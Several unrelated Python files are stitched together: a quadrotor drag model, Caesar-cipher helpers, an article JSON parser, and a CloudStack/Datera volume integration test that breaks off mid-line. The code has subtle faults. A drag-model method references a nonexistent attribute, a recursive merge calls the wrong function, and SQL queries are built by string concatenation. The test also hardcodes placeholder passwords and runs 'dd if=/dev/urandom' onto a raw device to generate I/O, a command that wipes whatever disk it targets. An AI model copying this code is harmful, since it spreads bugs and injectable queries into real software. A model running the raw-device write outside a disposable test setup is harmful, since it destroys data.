# coding=utf-8 """ This file is inspired from hector_quadrotor <http://wiki.ros.org/hector_quadrotor/> """ from __future__ import division from __future__ import with_statement # for python 2.5 import numpy as np import utils import math import printable import addict __author__ = 'Aijun Bai' class DragModel(printable.Printable): def __init__(self, params, verbose=False): super(DragModel, self).__init__(verbose) self.params = addict.Dict() self.params.C_wxy = params('C_wxy', 0.0) self.params.C_wz = params('C_wz', 0.0) self.params.C_mxy = params('C_mxy', 0.0) self.params.C_mz = params('C_mz', 0.0) self.enabled = params('enabled', True) self.u = np.zeros(6) self.y = np.zeros(6) def reset(self): self.u = np.zeros(6) self.y = np.zeros(6) def limit(self, min_, max_): for x in np.nditer(self.u, op_flags=['readwrite']): if math.isnan(x): print 'drag_model contains NaN values: {}'.format(self.drag_model.u) x[...] = 0.0 x[...] = utils.minmax(min_, x, max_) class QuadrotorAerodynamics(printable.Printable): def __init__(self, state, wind, params, verbose=False): super(QuadrotorAerodynamics, self).__init__(verbose) self.state = state self.wind = wind self.drag_model = DragModel(params, self.verbose) self.drag_model.reset() def apply(self, wrench, dt): if self.drag_model.enabled: self.drag_model.u[0] = (self.state.twist.linear[0] - self.wind[0]) self.drag_model.u[1] = -(self.state.twist.linear[1] - self.wind[1]) self.drag_model.u[2] = -(self.state.twist.linear[2] - self.wind[2]) self.drag_model.u[3] = self.state.twist.angular[0] self.drag_model.u[4] = -self.state.twist.angular[1] self.drag_model.u[5] = -self.state.twist.angular[2] self.drag_model.u[0:3] = utils.rotate(self.drag_model.u[0:3], self.state.quaternion) self.drag_model.u[3:6] = utils.rotate(self.drag_model.u[3:6], self.state.quaternion) self.drag_model.limit(-100.0, 100.0) if self.verbose: print utils.pv('self.__class__.__name__') self.f(self.drag_model.u, dt, self.drag_model.y) if self.verbose: utils.pv('self.drag_model') if self.verbose: utils.pv('wrench') if len(wrench): wrench.force.x += -self.drag_model.y[0] wrench.force.y += self.drag_model.y[1] wrench.force.z += self.drag_model.y[2] wrench.torque.x += -self.drag_model.y[3] wrench.torque.y += self.drag_model.y[4] wrench.torque.z += self.drag_model.y[5] else: wrench.force.x = -self.drag_model.y[0] wrench.force.y = self.drag_model.y[1] wrench.force.z = self.drag_model.y[2] wrench.torque.x = -self.drag_model.y[3] wrench.torque.y = self.drag_model.y[4] wrench.torque.z = self.drag_model.y[5] if self.verbose: utils.pv('wrench') return wrench def f(self, u, dt, y): absoluteVelocity = np.linalg.norm(u[0:3]) absoluteAngularVelocity = np.linalg.norm(u[3:6]) y[0] = self.drag_model.params.C_wxy * absoluteVelocity * u[0] y[1] = self.drag_model.params.C_wxy * absoluteVelocity * u[1] y[2] = self.drag_model.params.C_wz * absoluteVelocity * u[2] y[3] = self.drag_model.params.C_mxy * absoluteAngularVelocity * u[3] y[4] = self.drag_model.params.C_mxy * absoluteAngularVelocity * u[4] y[5] = self.drag_model.params.C_mz * absoluteAngularVelocity * u[5]
def alphabet_position(achar): ''' :param achar: a char :return: a zero base ordinal of the char ''' char_ord = ord(achar) if char_ord <= ord('z') and char_ord >= ord('a'): # if a char is lowercase return ord(achar) - ord('a') elif char_ord <= ord('Z') and char_ord >= ord('A'): # if a char is uppercase return ord(achar) - ord('A') else: return char_ord def rotate_character(char, rot): ''' :param char: a string of length 1 :param rot: rot could be negative integer here, but during encryption, the user input has to be digit, since I used isdigit for validation. :return: return the char after rotating rot ''' char_ord = alphabet_position(char) if ord(char) >= ord('a') and ord(char) <= ord('z'): encrypted_ord = (char_ord + rot) % 26 + ord('a') elif ord(char) >= ord('A') and ord(char) <= ord('Z'): encrypted_ord = (char_ord + rot) % 26 + ord('A') else: encrypted_ord = char_ord return chr(encrypted_ord) def encrypt_c(text, rot): ''' :param text: a string :param rot: an integer :return: an encrypted string ''' encrypted = '' for char in text: encrypted += rotate_character(char, rot) return encrypted
# coding: utf-8 import json import shortuuid class JsonParser(object): def _getArticle(self, content): return { 'add_time': content['add_time'], 'status': content['status'], 'type': content['type'], 'title': content['title'], 'detailtime': content['detailtime'], 'imgsid': content['imgsid'], 'imgwh': content['imgwh'], 'pkey': shortuuid.uuid(), 'commCount': content['commCount'], 'pubtime': content['pubtime'], 'mod_time': content['mod_time'], 'cover_img': content['cover_img'], 'content': content['content'] } def _getHotComment(self, content, pkey): if len(content['hotComments']) <= 0: return None models = [] for comment in content['hotComments']: models.append({ 'avatar_sid': comment['avatar_sid'], 'avatar_url': comment['avatar_url'], 'content': comment['content'], 'datetime': comment['datetime'], 'good': comment['good'], 'lou': comment['lou'], 'name': comment['name'], 'timestamp': comment['timestamp'], 'user': comment['user'], 'aid': pkey }) return models def _getUrlsList(self, content, pkey): if len(content['contentJson']) <= 0: return None articleModels = set() imgModels = [] for urlObj in content['contentJson']: if urlObj['type'] == 'img': # host = 'http://iil.3b2o.com/img/show/sid/' + urlObj['sid'] + '/w/576/h/1000/t/0/show.' + urlObj['extension'] imgModels.append({"id": urlObj['sid'], "extension": urlObj['extension']}) elif urlObj['type'] == 'article': host = 'http://zhiboba.3b2o.com/article/showListJson/' + urlObj['sid'] articleModels.add(host) return articleModels, {'imgList': imgModels, 'aid': pkey} def parse(self, url, content): if url is None or content is None: return try: jsonContent = json.loads(content) print(jsonContent['title'].encode("gbk")) # jsonContent['title'] = jsonContent['title'].encode("gbk") # jsonContent['content'] = jsonContent['content'].encode("gbk") article = self._getArticle(jsonContent) hotComment = self._getHotComment(jsonContent, article['pkey']) articleUrlList, imgUrlList = self._getUrlsList(jsonContent, article['pkey']) return articleUrlList, article, hotComment, imgUrlList except Exception as e: raise(e)
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging import unittest import random import os import json import time import math import XenAPI import collections import distutils.util logger = logging.getLogger(__name__) logger_handler = logging.FileHandler('/var/tmp/{}.log'.format(__name__)) logger_formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') logger_handler.setFormatter(logger_formatter) logger.addHandler(logger_handler) logger.setLevel(logging.INFO) # All tests inherit from cloudstackTestCase from marvin.cloudstackTestCase import cloudstackTestCase from nose.plugins.attrib import attr # Import Integration Libraries # base - contains all resources as entities and defines create, delete, list operations on them from marvin.lib.base import (Account, DiskOffering, ServiceOffering, StoragePool, User, VirtualMachine, Volume) # common - commonly used methods for all tests are listed here from marvin.lib.common import (get_domain, get_template, get_zone, list_clusters, list_hosts, list_virtual_machines, list_volumes, list_disk_offering) # utils - utility classes for common cleanup, external library wrappers, etc. from marvin.lib.utils import cleanup_resources from marvin.cloudstackAPI import resizeVolume #from dfs_sdk import DateraApi from dfs_sdk import get_api class TestData(): account = "account" capacityBytes = "capacitybytes" capacityIops = "capacityiops" clusterId = "clusterId" managedComputeOffering = "managedComputeoffering" nonManagedComputeOffering = "nonManagedComputeoffering" diskName = "diskname" diskOffering = "diskoffering" domainId = "domainId" hypervisor = "hypervisor" login = "login" mvip = "mvip" password = "password" port = "port" primaryStorage = "primarystorage" provider = "provider" scope = "scope" Datera = "datera" storageTag = "Datera_SAN_1" tags = "tags" templateCacheName = "centos56-x86-64-xen" # TODO templateName = "templatename" testAccount = "testaccount" url = "url" user = "user" username = "username" virtualMachine = "virtualmachine" virtualMachine2 = "virtualmachine2" volume_1 = "volume_1" volume_2 = "volume_2" xenServer = "xenserver" zoneId = "zoneId" def __init__(self): self.testdata = { TestData.Datera: { TestData.mvip: "172.19.2.214", TestData.login: "admin", TestData.password: "password", TestData.port: 80, TestData.url: "https://172.19.2.214:443" }, TestData.xenServer: { TestData.username: "root", TestData.password: "password" }, TestData.account: { "email": "test@test.com", "firstname": "John", "lastname": "Doe", "username": "test", "password": "test" }, TestData.testAccount: { "email": "test2@test2.com", "firstname": "Jane", "lastname": "Doe", "username": "test2", "password": "test" }, TestData.user: { "email": "user@test.com", "firstname": "Jane", "lastname": "Doe", "username": "testuser", "password": "password" }, TestData.primaryStorage: { "name": "Datera-%d" % random.randint(0, 100), TestData.scope: "ZONE", "url": "MVIP=172.19.2.214;SVIP=172.28.214.9;" + "clusterAdminUsername=admin;clusterAdminPassword=password;" + "clusterDefaultMinIops=10000;clusterDefaultMaxIops=15000;" + "numReplicas=3;", TestData.provider: "Datera", TestData.tags: TestData.storageTag, TestData.capacityIops: 4500000, TestData.capacityBytes: 2251799813685248, TestData.hypervisor: "Any" }, TestData.virtualMachine: { "name": "TestVM", "displayname": "TestVM", "privateport": 22, "publicport": 22, "protocol": "tcp" }, TestData.virtualMachine2: { "name": "TestVM2", "displayname": "TestVM2", "privateport": 22, "publicport": 22, "protocol": "tcp" }, TestData.managedComputeOffering: { "name": "DT_CO_1", "displaytext": "DT_CO_1 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 100, "memory": 128, "storagetype": "shared", "customizediops": False, "miniops": "10000", "maxiops": "15000", "hypervisorsnapshotreserve": 200, "tags": TestData.storageTag }, TestData.nonManagedComputeOffering: { "name": "DT_CO_2", "displaytext": "DT_CO_2 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 100, "memory": 128, "storagetype": "shared", "customizediops": False, "miniops": "10000", "maxiops": "15000", "hypervisorsnapshotreserve": 200, "tags": TestData.storageTag }, TestData.diskOffering: { "name": "DT_DO_1", "displaytext": "DT_DO_1 (5GB Min IOPS = 300; Max IOPS = 500)", "disksize": 5, "customizediops": False, "miniops": 300, "maxiops": 500, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "testdiskofferings": { "customiopsdo": { "name": "DT_Custom_Iops_DO", "displaytext": "Customized Iops DO", "disksize": 5, "customizediops": True, "miniops": 500, "maxiops": 1000, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "customsizedo": { "name": "DT_Custom_Size_DO", "displaytext": "Customized Size DO", "disksize": 5, "customizediops": False, "miniops": 500, "maxiops": 1000, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "customsizeandiopsdo": { "name": "DT_Custom_Iops_Size_DO", "displaytext": "Customized Size and Iops DO", "disksize": 10, "customizediops": True, "miniops": 400, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newiopsdo": { "name": "DT_New_Iops_DO", "displaytext": "New Iops (min=350, max = 700)", "disksize": 5, "miniops": 350, "maxiops": 700, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newsizedo": { "name": "DT_New_Size_DO", "displaytext": "New Size: 10", "disksize": 10, "customizediops": False, "miniops": 400, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newsizeandiopsdo": { "name": "DT_New_Size_Iops_DO", "displaytext": "New Size and Iops", "disksize": 10, "customizediops": False, "miniops": 200, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" } }, TestData.volume_1: { TestData.diskName: "test-volume", }, TestData.volume_2: { TestData.diskName: "test-volume-2", }, TestData.templateName: "tiny linux kvm", # TODO TestData.zoneId: 1, TestData.clusterId: 1, TestData.domainId: 1, } def update(self, overrideFileName): if os.path.exists(overrideFileName): with open(overrideFileName) as fd: self.testdata = self._update(self.testdata, json.loads(fd.read())) def _update(self, d, u): for k, v in u.iteritems(): if isinstance(v, collections.Mapping): r = self.update(d.get(k, {}), v) d[k] = r else: d[k] = u[k] return d class TestVolumes(cloudstackTestCase): _should_only_be_one_vm_in_list_err_msg = "There should only be one VM in this list." _should_only_be_one_volume_in_list_err_msg = "There should only be one volume in this list." _volume_vm_id_and_vm_id_do_not_match_err_msg = "The volume's VM ID and the VM's ID do not match." _vm_not_in_running_state_err_msg = "The VM is not in the 'Running' state." _vm_not_in_stopped_state_err_msg = "The VM is not in the 'Stopped' state." _sr_not_shared_err_msg = "The SR is not shared." _list_should_be_empty = "The list should be empty." _volume_resize_err = "The Volume was not resized correctly." @classmethod def setUpXenServer(cls): # Set up xenAPI connection hosts = list_hosts(cls.apiClient, clusterid=cls.testdata[TestData.clusterId]) xenserver_info = cls.testdata[TestData.xenServer] for h in hosts: host_ip = "https://" + h.ipaddress try: cls.xen_session = XenAPI.Session(host_ip) cls.xen_session.xenapi.login_with_password(xenserver_info[TestData.username], xenserver_info[TestData.password]) break except XenAPI.Failure as e: pass cls.compute_offering = ServiceOffering.create( cls.apiClient, cls.testdata[TestData.managedComputeOffering] ) cls.device_name = 'xvdb' @classmethod def setUpKVM(cls): logger.info("Setting up KVM") # KVM doesn't support root disks cls.compute_offering = ServiceOffering.create( cls.apiClient, cls.testdata[TestData.nonManagedComputeOffering] ) cls.device_name = 'vdb' @classmethod def setUpClass(cls): """ 1. Init ACS API and DB connection 2. Init Datera API connection 3. Create ACS Primary storage 4. Create ACS compute and disk offering. 5. Create ACS data disk without attaching to a VM """ logger.info("Setting up Class") # Set up API client testclient = super(TestVolumes, cls).getClsTestClient() cls.apiClient = testclient.getApiClient() cls.dbConnection = testclient.getDbConnection() # Setup test data td = TestData() if cls.config.TestData and cls.config.TestData.Path: td.update(cls.config.TestData.Path) cls.testdata = td.testdata # Get Resources from Cloud Infrastructure cls.zone = get_zone(cls.apiClient, zone_name=cls.config.zones[0].name) cls.cluster = list_clusters(cls.apiClient)[0] cls.template = get_template(cls.apiClient, cls.zone.id) cls.domain = get_domain(cls.apiClient, cls.testdata[TestData.domainId]) # Set up datera connection datera = cls.testdata[TestData.Datera] cls.dt_client = get_api( username=datera[TestData.login], password=datera[TestData.password], hostname=datera[TestData.mvip], version="v2" ) # Create test account cls.account = Account.create( cls.apiClient, cls.testdata["account"], admin=1 ) # Set up connection to make customized API calls cls.user = User.create( cls.apiClient, cls.testdata["user"], account=cls.account.name, domainid=cls.domain.id ) primarystorage = cls.testdata[TestData.primaryStorage] cls.primary_storage = StoragePool.create( cls.apiClient, primarystorage, scope=primarystorage[TestData.scope], zoneid=cls.zone.id, provider=primarystorage[TestData.provider], tags=primarystorage[TestData.tags], capacityiops=primarystorage[TestData.capacityIops], capacitybytes=primarystorage[TestData.capacityBytes], hypervisor=primarystorage[TestData.hypervisor] ) cls.disk_offering = DiskOffering.create( cls.apiClient, cls.testdata[TestData.diskOffering] ) cls.disk_offering_new = DiskOffering.create( cls.apiClient, cls.testdata['testdiskofferings']['newsizeandiopsdo'] ) cls.supports_resign = cls._get_supports_resign() # Set up hypervisor specific connections if cls.cluster.hypervisortype.lower() == 'xenserver': cls.setUpXenServer() if cls.cluster.hypervisortype.lower() == 'kvm': cls.setUpKVM() # Create 1 data volume_1 cls.volume = Volume.create( cls.apiClient, cls.testdata[TestData.volume_1], account=cls.account.name, domainid=cls.domain.id, zoneid=cls.zone.id, diskofferingid=cls.disk_offering.id ) # Resources that are to be destroyed cls._cleanup = [ cls.volume, cls.compute_offering, cls.disk_offering, cls.disk_offering_new, cls.user, cls.account ] @classmethod def tearDownClass(cls): logger.info("Tearing Down Class") try: cleanup_resources(cls.apiClient, cls._cleanup) cls.primary_storage.delete(cls.apiClient) cls._purge_datera_volumes() except Exception as e: logging.debug("Exception in tearDownClass(cls): %s" % e) def setUp(self): logger.info("Setup test") self.attached = False self.cleanup = [] def tearDown(self): logger.info("Tearing Down test") cleanup_resources(self.apiClient, self.cleanup) @classmethod def _set_supports_resign(cls, val): supports_resign = str(val).lower() cls.supports_resign = val # make sure you can connect to MySQL: https://teamtreehouse.com/community/cant-connect-remotely-to-mysql-server-with-mysql-workbench sql_query = "Update host_details Set value = '" + supports_resign + "' Where name = 'supportsResign'" cls.dbConnection.execute(sql_query) sql_query = "Update cluster_details Set value = '" + supports_resign + "' Where name = 'supportsResign'" cls.dbConnection.execute(sql_query) @classmethod def _get_supports_resign(cls): sql_query = "SELECT value from cluster_details Where name='supportsResign' AND cluster_id=%d" % cls.testdata[ TestData.clusterId] sql_result = cls.dbConnection.execute(sql_query) logger.warn(sql_result) if len(sql_result) < 1: return False return bool(distutils.util.strtobool(sql_result[0][0].lower())) def _get_cs_storage_pool_db_id(self, storage_pool): return self._get_db_id("storage_pool", storage_pool) def _get_db_id(self, table, db_obj): sql_query = "Select id From " + table + " Where uuid = '" + str(db_obj.id) + "'" sql_result = self.dbConnection.execute(sql_query) return sql_result[0][0] @classmethod def _purge_datera_volumes(cls): logger.warn("Deleting all volumes") for ai in cls.dt_client.app_instances.get().values(): logger.warn(ai) if 'CS-T' in ai['name']: ai.set(admin_state="offline") ai.delete() def test_01_attach_new_volume_to_stopped_VM(self): '''Attach a volume to a stopped virtual machine, then start VM''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) template_volume_name = \ self._get_app_instance_name_from_cs_volume(self.template, vol_type='TEMPLATE') dt_volume = self._check_and_get_dt_volume(template_volume_name) virtual_machine.stop(self.apiClient, forced=True) new_volume = Volume.create( self.apiClient, self.testdata[TestData.volume_2], account=self.account.name, domainid=self.domain.id, zoneid=self.zone.id, diskofferingid=self.disk_offering.id ) self.cleanup.append(new_volume) self._check_and_get_cs_volume(new_volume.id, self.testdata[TestData.volume_2][TestData.diskName]) new_volume = virtual_machine.attach_volume( self.apiClient, new_volume ) newvolume = self._check_and_get_cs_volume(new_volume.id, self.testdata[TestData.volume_2][TestData.diskName]) virtual_machine.start(self.apiClient) vm = self._get_vm(virtual_machine.id) self.assertEqual( newvolume.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), "running", TestVolumes._vm_not_in_running_state_err_msg ) dt_volume_size = self._get_volume_size_with_hsr(newvolume) iqn = self._get_iqn(newvolume) dt_new_volname = self._get_app_instance_name_from_cs_volume(newvolume) dt_volume = self._check_and_get_dt_volume(dt_new_volname) self._check_size_and_iops(dt_volume, newvolume, dt_volume_size) initiator_group_name = self._get_initiator_group_name() self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) logger.info("Detach volume from the VM") virtual_machine.detach_volume( self.apiClient, new_volume ) def test_02_attach_detach_attach_volume(self): '''Attach, detach, and attach volume to a running VM''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) ####################################### ####################################### # STEP 1: Attach volume to running VM # ####################################### ####################################### self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) initiator_group_name = self._get_initiator_group_name() self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) iqn = self._get_iqn(self.volume) dt_volume_size = self._get_volume_size_with_hsr(self.volume) dt_volume_name = self._get_app_instance_name_from_cs_volume(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name) self._check_size_and_iops(dt_volume, vol, dt_volume_size) self._check_hypervisor(iqn) ######################################### ######################################### # STEP 2: Detach volume from running VM # ######################################### ######################################### self.volume = virtual_machine.detach_volume( self.apiClient, self.volume ) self.attached = False vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) self.assertEqual( vol.virtualmachineid, None, "The volume should not be attached to a VM." ) self.assertEqual( vm.state.lower(), 'running', str(vm.state) ) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name, False) self._check_hypervisor(iqn, False) ####################################### ####################################### # STEP 3: Attach volume to running VM # ####################################### ####################################### time.sleep(30) self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) def test_03_attached_volume_reboot_VM(self): '''Attach volume to running VM, then reboot.''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) ####################################### ####################################### # STEP 1: Attach volume to running VM # ####################################### ####################################### self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True dt_volume_name = self._get_app_instance_name_from_cs_volume(self.volume) vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) initiator_group_name = self._get_initiator_group_name() self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) iqn = self._get_iqn(self.volume) volume_size_gb = self._get_volume_size_with_hsr(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_size_and_iops(dt_volume, vol, volume_size_gb) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) ####################################### ####################################### # STEP 2: Reboot VM with attached vol # ####################################### ####################################### virtual_machine.reboot(self.apiClient) vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) iqn = self._get_iqn(self.volume) dt_volume_size = self._get_volume_size_with_hsr(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_size_and_iops(dt_volume, vol, dt_volume_size) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) def _check_if_device_visible_in_vm(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "iostat | grep %s" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) if not res: self.fail("Device %s not found on VM: %s" % (dev_name, vm.ipaddress)) def _check_list(self, in_list, expected_size_of_list, err_msg): self.assertEqual( isinstance(in_list, list), True, "'in_list' is not a list." ) self.assertEqual( len(in_list), expected_size_of_list, err_msg ) def _check_initiator_group(self, dt_volume, initiator_group_name, should_exist=True): volume_initiator_groups = dt_volume['storage_instances']['storage-1']['acl_policy']['initiator_groups'] if should_exist: self.assertTrue( initiator_group_name in volume_initiator_groups[0], "Initiator group not assigned to volume" ) else: self.assertTrue( len(volume_initiator_groups) == 0, "Initiator group still asigined to volume, should have been removed" ) def _check_volume(self, volume, volume_name, disk_offering): self.assertTrue( volume.name.startswith(volume_name), "The volume name is incorrect." ) self.assertEqual( volume.diskofferingid, disk_offering.id, "The disk offering is incorrect." ) self.assertEqual( volume.zoneid, self.zone.id, "The zone is incorrect." ) self.assertEqual( volume.storagetype, self.disk_offering.storagetype, "The storage type is incorrect." ) def _check_size_and_iops(self, dt_volume, cs_volume, size): dt_max_total_iops = dt_volume['storage_instances']['storage-1']['volumes']['volume-1']['performance_policy'][ 'total_iops_max'] self.assertEqual( dt_max_total_iops, cs_volume.maxiops, "Check QOS - Max IOPS: " + str(dt_max_total_iops) ) dt_volume_size = dt_volume['storage_instances']['storage-1']['volumes']['volume-1']['size'] self.assertEqual( dt_volume_size, size, "Check volume size: " + str(dt_volume_size) ) def _check_and_get_cs_volume(self, volume_id, volume_name, disk_offering=None): if not disk_offering: disk_offering = self.disk_offering list_volumes_response = list_volumes( self.apiClient, id=volume_id ) self._check_list(list_volumes_response, 1, TestVolumes._should_only_be_one_volume_in_list_err_msg) cs_volume = list_volumes_response[0] self._check_volume(cs_volume, volume_name, disk_offering) return cs_volume def _get_app_instance_name_from_cs_volume(self, cs_volume, vol_type='VOLUME'): """ Get Datera app_instance name based on ACS data object types Eg. CS-V-test-volume-7XWJ5Q-dfc41254-371a-40b3-b410-129eb79893c0 """ app_inst_prefix = 'CS' if vol_type == 'VOLUME': vol_type_char = 'V' uuid = cs_volume.id name = cs_volume.name app_instance_name = app_inst_prefix + '-' + vol_type_char + '-' + name + '-' + uuid if vol_type == 'TEMPLATE': vol_type_char = 'T' uuid = cs_volume.id primary_storage_db_id = str(self._get_cs_storage_pool_db_id(self.primary_storage)) app_instance_name = app_inst_prefix + '-' + vol_type_char + '-' + uuid + '-' + primary_storage_db_id return app_instance_name def _get_iqn(self, cs_volume): """ Get IQN for the CS volume from Datera """ app_instance_name = self._get_app_instance_name_from_cs_volume(cs_volume) app_instance = self.dt_client.app_instances.get(app_instance_name) return app_instance['storage_instances']['storage-1']['access']['iqn'] def _get_cs_volume_size_with_hsr(self, cs_volume): disk_size_bytes = cs_volume.size disk_offering_id = cs_volume.diskofferingid disk_offering = list_disk_offering(self.apiClient, id=disk_offering_id)[0] hsr = disk_offering.hypervisorsnapshotreserve disk_size_with_hsr_bytes = disk_size_bytes + (disk_size_bytes * hsr) / 100 disk_size_with_hsr_gb = int(math.ceil(disk_size_with_hsr_bytes / (1024 ** 3))) return disk_size_with_hsr_gb def _get_volume_size_with_hsr(self, cs_volume): app_instance_name = self._get_app_instance_name_from_cs_volume(cs_volume) app_instance = self.dt_client.app_instances.get(app_instance_name) volume_size_gb = app_instance['storage_instances']['storage-1']['volumes']['volume-1']['size'] self.assertEqual( isinstance(volume_size_gb, int), True, "The volume size should be a non-zero integer." ) return volume_size_gb def _get_initiator_group_name(self): init_group_prefix = 'CS-InitiatorGroup' initiator_group_name = init_group_prefix + '-' + self.cluster.id self.dt_client.initiator_groups.get(initiator_group_name) return initiator_group_name def _get_dt_volumes(self): return self.dt_client.app_instances.get() def _get_vm(self, vm_id): list_vms_response = list_virtual_machines(self.apiClient, id=vm_id) self._check_list(list_vms_response, 1, TestVolumes._should_only_be_one_vm_in_list_err_msg) return list_vms_response[0] def _check_and_get_dt_volume(self, dt_volume_name, should_exist=True): dt_volume = None dt_volumes = self._get_dt_volumes() for volume in dt_volumes.values(): if volume['name'] == dt_volume_name: dt_volume = volume break if should_exist: self.assertNotEqual( dt_volume, None, "Check if Datera volume was created: " + str(dt_volumes) ) else: self.assertEqual( dt_volume, None, "Check if volume was deleted: " + str(dt_volumes) ) return dt_volume def _resize_volume(self, volume, new_disk_offering): cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume.id cmd.diskofferingid = new_disk_offering.id self.apiClient.resizeVolume(cmd) do_size_bytes = int(new_disk_offering.disksize * (1024 ** 3)) retries = 3 success = False while retries > 0: retries -= 1 list_volumes_response = list_volumes( self.apiClient, id=volume.id ) for vol in list_volumes_response: if vol.id == volume.id and \ int(vol.size) == do_size_bytes and \ vol.state == 'Ready': success = True if success: break else: time.sleep(10) self.assertEqual(success, True, self._volume_resize_err) def _check_hypervisor(self, iqn, should_exist=True): if self.cluster.hypervisortype.lower() == 'xenserver': self._check_xen_sr(iqn, should_exist) else: return def _check_xen_sr(self, iqn, should_exist=True): xen_sr_name = "/" + iqn + "/0" if should_exist: xen_sr = self.xen_session.xenapi.SR.get_by_name_label(xen_sr_name)[0] self.sr_shared = self.xen_session.xenapi.SR.get_shared(xen_sr) self.assertEqual( self.sr_shared, True, TestVolumes._sr_not_shared_err_msg ) else: xen_sr = self.xen_session.xenapi.SR.get_by_name_label(xen_sr_name) self._check_list(xen_sr, 0, TestVolumes._list_should_be_empty) def _check_if_device_removed_in_vm(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "iostat | grep %s" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) if res: self.fail("Device %s still attached on VM: %s" % (dev_name, vm.ipaddress)) def _start_device_io(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "dd if=/dev/urandom of=/dev/%s &" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) def _stop_device_io(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "killall -9 dd" res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) def _get_bytes_written(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "iostat | grep 